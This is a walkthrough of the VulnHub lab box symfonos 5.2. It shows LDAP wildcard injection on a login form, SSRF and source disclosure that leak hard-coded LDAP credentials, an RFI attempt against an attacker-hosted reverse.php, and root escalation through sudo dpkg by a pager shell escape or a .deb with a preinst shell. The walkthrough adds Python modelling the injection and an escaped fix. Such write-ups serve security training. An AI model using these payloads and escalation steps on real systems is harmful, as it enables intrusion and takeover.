【攻略鴨】symfonos 5.2 VulnHub walkthrough

This write-up is purely fictional; 攻略鴨 would appreciate follows and likes on Bilibili!
Target IP: 192.168.31.197
External reconnaissance
Visiting http://192.168.31.197/ shows only an image.
Port scan
PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
389/tcp open  ldap     syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl  syn-ack ttl 63
Note the TTLs: SSH answers with ttl 64 while HTTP and LDAP answer with ttl 63, one hop further away, and SSH identifies as Debian while Apache identifies as Ubuntu. That points to the web and LDAP services running in containers behind the Debian host, which is consistent with the 172.18.0.22 address that turns up later in admin.php.
LDAP Results
|   <ROOT>
|       namingContexts: dc=symfonos,dc=local
|       supportedControl: 2.16.840.1.113730.3.4.18
...
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedSASLMechanisms: OTP
|       supportedSASLMechanisms: NTLM
|       supportedSASLMechanisms: CRAM-MD5
|_      subschemaSubentry: cn=Subschema
LDAP anonymous bind
$ ldapdomaindump 192.168.31.197
Failed. ldapdomaindump is built around the Active Directory schema, so a failure against OpenLDAP says little; the equivalent check here is an anonymous (simple, no -D) ldapsearch against the base DN dc=symfonos,dc=local that nmap already revealed.
Web directory enumeration
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.197/FUZZ -e .php,.txt -c
.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
home.php                [Status: 302, Size: 979, Words: 117, Lines: 29, Duration: 2ms]
admin.php               [Status: 200, Size: 1650, Words: 707, Lines: 40, Duration: 1ms]
static                  [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 0ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 0ms]
portraits.php           [Status: 200, Size: 165, Words: 10, Lines: 4, Duration: 13ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]
http://192.168.31.197/admin.php is a login form (the credentials are sent as GET parameters).
Trying SQL injection
GET /admin.php?username=admin%27or%271&password=asfd
No success.
Vulnerability test points
(1) Sensitive information disclosure
GET /home.php
Response:
HTTP/1.1 302 Found
The redirect response still carries a body, and in it the URL http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php is visible: the unauthenticated redirect leaks both the url parameter that home.php takes and the fact that it fetches a full URL.
(2) LDAP injection
Since the host exposes an LDAP service, the login form is worth testing for LDAP injection. In LDAP filters * is the wildcard, so if the form drops the input into a filter unescaped, a wildcard in both fields matches any account:
GET /admin.php?username=*&password=*
Login succeeds.
The authenticated page is http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php (the same URL leaked by the redirect).
Replace the host part with the target address: http://192.168.31.197/home.php?url=http://127.0.0.1/portraits.php
Testing the url parameter for file inclusion
Trying RFI
http://192.168.31.197/home.php?url=http://192.168.31.38:8088/reverse.php
The PHP is not parsed: the target fetches reverse.php from the attacker's web server at 192.168.31.38:8088 and returns its source verbatim instead of executing it.
GET /home.php?url=http://127.0.0.1/admin.php
Returns the rendered page, but no PHP source, because the target's own Apache executed admin.php before handing the output over.
Trying LFI
GET /home.php?url=admin.php
The response contains the raw source of admin.php, including:
$ldap_ch = ldap_connect("ldap://172.18.0.22");
$bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
$filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);
Taken together, the three requests show that home.php hands the url parameter to a file-read function and echoes the result rather than passing it to include(): remote PHP comes back as text, and a local relative path comes back as raw source. That is SSRF plus source disclosure, not code execution. The disclosed source shows the real bug behind the login bypass: $username and $password are interpolated into the filter string without ldap_escape(), so username=* and password=* produce (&(uid=*)(userPassword=*)), a presence check that any entry carrying both attributes satisfies. It also hands over the hard-coded bind credentials for cn=admin and the LDAP container's internal address, 172.18.0.22.
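To make the injection concrete, here is an added Python model of the filter admin.php builds (illustration code written for this walkthrough, not code from the box or from the original author). It reproduces the raw string interpolation from the disclosed source next to an RFC 4515-escaped version, and evaluates both against a constructed two-entry directory taken from the ldapsearch output on this page. The evaluator is a deliberately minimal one that only understands the (&(a=v)(b=v)) shape the page's filter has; the directory contents, the escaping function and the evaluator are the assumptions.

```python
import re

# Constructed sample directory: the two entries the ldapsearch on this page
# returned, reduced to the attributes the filter touches. Note that the admin
# entry has cn but no uid (it is an organizationalRole, not a posixAccount).
DIRECTORY = [
    {"dn": "cn=admin,dc=symfonos,dc=local",
     "cn": "admin",
     "userPassword": "{SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm"},
    {"dn": "uid=zeus,dc=symfonos,dc=local",
     "uid": "zeus",
     "cn": "zeus",
     "userPassword": "cetkKf4wCuHC9FET"},
]


def ldap_escape_filter(value: str) -> str:
    """Escape a value for use inside a filter assertion (RFC 4515 section 3):
    '*', '(', ')', '\\', NUL and every non-ASCII byte become \\XX."""
    out = []
    for b in value.encode("utf-8"):
        if b in b"*()\\" or b == 0 or b >= 0x80:
            out.append("\\%02x" % b)
        else:
            out.append(chr(b))
    return "".join(out)


def build_filter(username: str, password: str, escape: bool) -> str:
    """The filter admin.php builds. escape=False reproduces the disclosed
    source (raw interpolation); escape=True is the hardened form."""
    if escape:
        username = ldap_escape_filter(username)
        password = ldap_escape_filter(password)
    return "(&(uid=%s)(userPassword=%s))" % (username, password)


_ASSERTION = re.compile(r"\(([A-Za-z][A-Za-z0-9-]*)=([^()]*)\)")


def _assertion_regex(value: str):
    """Turn an assertion value into an anchored regex. Any '*' still in the
    value is a wildcard (escaping turns a literal one into \\2a); \\XX
    sequences are unescaped to the character they stand for (ASCII range,
    which is all this sample needs)."""
    def unescape(part: str) -> str:
        return re.sub(r"\\([0-9a-fA-F]{2})",
                      lambda m: chr(int(m.group(1), 16)), part)
    parts = [re.escape(unescape(p)) for p in value.split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.DOTALL)


def search(filter_str: str) -> list:
    """Minimal evaluator for the conjunctive shape admin.php uses,
    (&(attr=value)(attr=value)...); returns the DNs that match. As in a real
    server, an assertion is false for entries that lack the attribute."""
    m = re.fullmatch(r"\(&((?:\([^()]*\))+)\)", filter_str)
    if m is None:
        raise ValueError("malformed or unsupported filter: " + filter_str)
    assertions = _ASSERTION.findall(m.group(1))
    hits = []
    for entry in DIRECTORY:
        if all(attr in entry and _assertion_regex(val).match(entry[attr])
               for attr, val in assertions):
            hits.append(entry["dn"])
    return hits


if __name__ == "__main__":
    for user, pw in [("*", "*"), ("zeus", "*"), ("zeus", "cetkKf4wCuHC9FET")]:
        for escape in (False, True):
            f = build_filter(user, pw, escape)
            print("%-8s %-44s -> %s" % ("escaped" if escape else "raw", f, search(f)))
```

Compare the two rows for ("*", "*"): the raw filter returns zeus, the escaped filter (&(uid=\2a)(userPassword=\2a)) returns nothing because the asterisks are now literal. admin is not returned even by the raw wildcard filter, since its entry has no uid attribute, so (uid=*) is false for it; presence and substring assertions only ever match entries that carry the attribute.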
Accessing LDAP with the recovered credentials
With jxplorer
DN: cn=admin,dc=symfonos,dc=local
Password: qMDdyZh3cT6eeAWD
With ldapsearch
$ ldapsearch -x -H ldap://192.168.31.197 -D 'cn=admin,dc=symfonos,dc=local' -w qMDdyZh3cT6eeAWD -b 'dc=symfonos,dc=local'
# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos
# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=
# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User
The same data as jxplorer shows it after binding, with the base64 LDIF values decoded:
cn: admin
userPassword: {SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm
cn: zeus
gecos: Zeus User
gidNumber: 14564100
homeDirectory: /home/zeus
loginShell: /bin/bash
mail: zeus@symfonos.local
objectClass: top, posixAccount, inetOrgPerson
sn: 3
uid: zeus
uidNumber: 14583102
userPassword: cetkKf4wCuHC9FET
The double colon in ldapsearch's userPassword:: lines only means the LDIF value is base64-encoded; it says nothing about hashing. Decoded, admin's password is stored as a salted SHA-1 ({SSHA}) hash, while zeus's is stored in cleartext and can be used directly.
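The following added Python (illustration code written for this walkthrough, not from the box or the original author) does the decoding step above by hand: it parses the userPassword lines from the ldapsearch output, tells the storage schemes apart by their RFC 2307 prefix, and verifies candidate passwords against both forms. The {SSHA} layout it assumes (20-byte SHA-1 digest followed by the salt, base64-encoded) is the standard OpenLDAP one; the sample LDIF is constructed from this page's output. Whether admin's stored hash matches the bind password found in admin.php is reported when the script runs but not assumed.

```python
import base64
import hashlib
import os


def parse_ldif_values(ldif: str, attr: str) -> dict:
    """Collect one value of attr per DN from LDIF text. 'attr:: ' carries a
    base64-encoded value (what ldapsearch prints for userPassword);
    'attr: ' carries it in plain form."""
    values, dn = {}, None
    for line in ldif.splitlines():
        if line.startswith("dn: "):
            dn = line[4:].strip()
        elif dn and line.startswith(attr + ":: "):
            values[dn] = base64.b64decode(line[len(attr) + 3:].strip()).decode()
        elif dn and line.startswith(attr + ": "):
            values[dn] = line[len(attr) + 2:].strip()
    return values


def classify(stored: str) -> str:
    """Return the RFC 2307 scheme name ({SSHA}, {SHA}, {CRYPT}, ...) or
    'cleartext' when there is no scheme prefix at all."""
    if stored.startswith("{") and "}" in stored:
        return stored[1:stored.index("}")]
    return "cleartext"


def ssha_hash(password: str, salt: bytes = None) -> str:
    """Produce an OpenLDAP {SSHA} value: base64(sha1(password || salt) || salt)."""
    if salt is None:
        salt = os.urandom(4)
    digest = hashlib.sha1(password.encode() + salt).digest()
    return "{SSHA}" + base64.b64encode(digest + salt).decode()


def check_password(stored: str, candidate: str) -> bool:
    """Verify a candidate against a stored userPassword value. Handles the two
    forms seen on this page: {SSHA} and cleartext."""
    scheme = classify(stored)
    if scheme == "cleartext":
        return stored == candidate
    if scheme == "SSHA":
        raw = base64.b64decode(stored[len("{SSHA}"):])
        digest, salt = raw[:20], raw[20:]
        return hashlib.sha1(candidate.encode() + salt).digest() == digest
    raise ValueError("unsupported password scheme: " + scheme)


# Constructed input: the two userPassword lines from the ldapsearch output above.
SAMPLE_LDIF = """\
dn: cn=admin,dc=symfonos,dc=local
cn: admin
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
"""

if __name__ == "__main__":
    passwords = parse_ldif_values(SAMPLE_LDIF, "userPassword")
    for dn, stored in passwords.items():
        print("%-32s %-9s %s" % (dn, classify(stored), stored))
    # The bind password disclosed by admin.php; the page never states whether
    # the admin entry's own userPassword is the same secret, so only report it.
    print("admin hash matches the bind password:",
          check_password(passwords["cn=admin,dc=symfonos,dc=local"], "qMDdyZh3cT6eeAWD"))
```

When a directory dump mixes hashed and cleartext userPassword values like this one does, classify() is the quick triage step: cleartext entries are usable immediately, {SSHA} entries need an offline guess against the salt embedded in the value.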
Try the recovered username and password over SSH
ssh zeus@192.168.31.197
zeus@symfonos5:~$ id
uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
The uid is 1000 rather than the 14583102 stored in LDAP, so sshd is authenticating a local account, not the directory entry; the password was simply reused between the two.
Privilege escalation via sudo
$ sudo -l
Matching Defaults entries for zeus on symfonos5:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zeus may run the following commands on symfonos5:
    (root) NOPASSWD: /usr/bin/dpkg
Method 1: escape from the pager
When run on a terminal, dpkg -l sends its listing through a pager (less), and less executes whatever follows ! as a shell command; because dpkg was started with sudo, that shell runs as root.
$ sudo dpkg -l
ii  cpio              2.12+dfsg-9            amd64     GNU cpio -- a program to manage archives of files
ii  cpp               4:8.3.0-1              amd64     GNU C preprocessor (cpp)
ii  cpp-8             8.3.0-6                amd64     GNU C preprocessor
ii  cron              3.0pl1-134+deb10u1     amd64     process scheduling daemon
At the pager prompt at the bottom of the listing, type:
!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
Method 2: a .deb with a malicious maintainer script
fpm needs Ruby and rubygems; on Debian-derived systems install it with:
sudo apt-get install ruby ruby-dev rubygems build-essential
sudo gem install --no-document fpm
fpm --version
touch exp.sh
echo 'exec /bin/sh' > exp.sh
fpm -n x -s dir -t deb -a all --before-install exp.sh .
ls -al
-rw-r--r--  1 kali kali 8341274 Feb 21 04:38 x_1.0_all.deb
--before-install exp.sh makes exp.sh the package's preinst maintainer script, which dpkg runs as root before unpacking any files; the packaged contents (the current directory, hence the 8 MB size) do not matter. The same package can be built without the Ruby toolchain using dpkg-deb --build on a directory that contains DEBIAN/control and an executable DEBIAN/preinst.
Upload the package to the target and install it:
$ sudo dpkg -i x_1.0_all.deb
Selecting previously unselected package x.
(Reading database ... 53057 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# id
uid=0(root) gid=0(root) groups=0(root)
Other
Flag
# cat /root/proof.txt
Congrats on rooting symfonos:5!
Box issues
When I fuzzed the LDAP injection and the LFI they did not work at first; the error returned was "Wrong scheme! You can only use http or https!", which looked so genuine that I assumed there was a filter. It only started working after re-importing the virtual machine.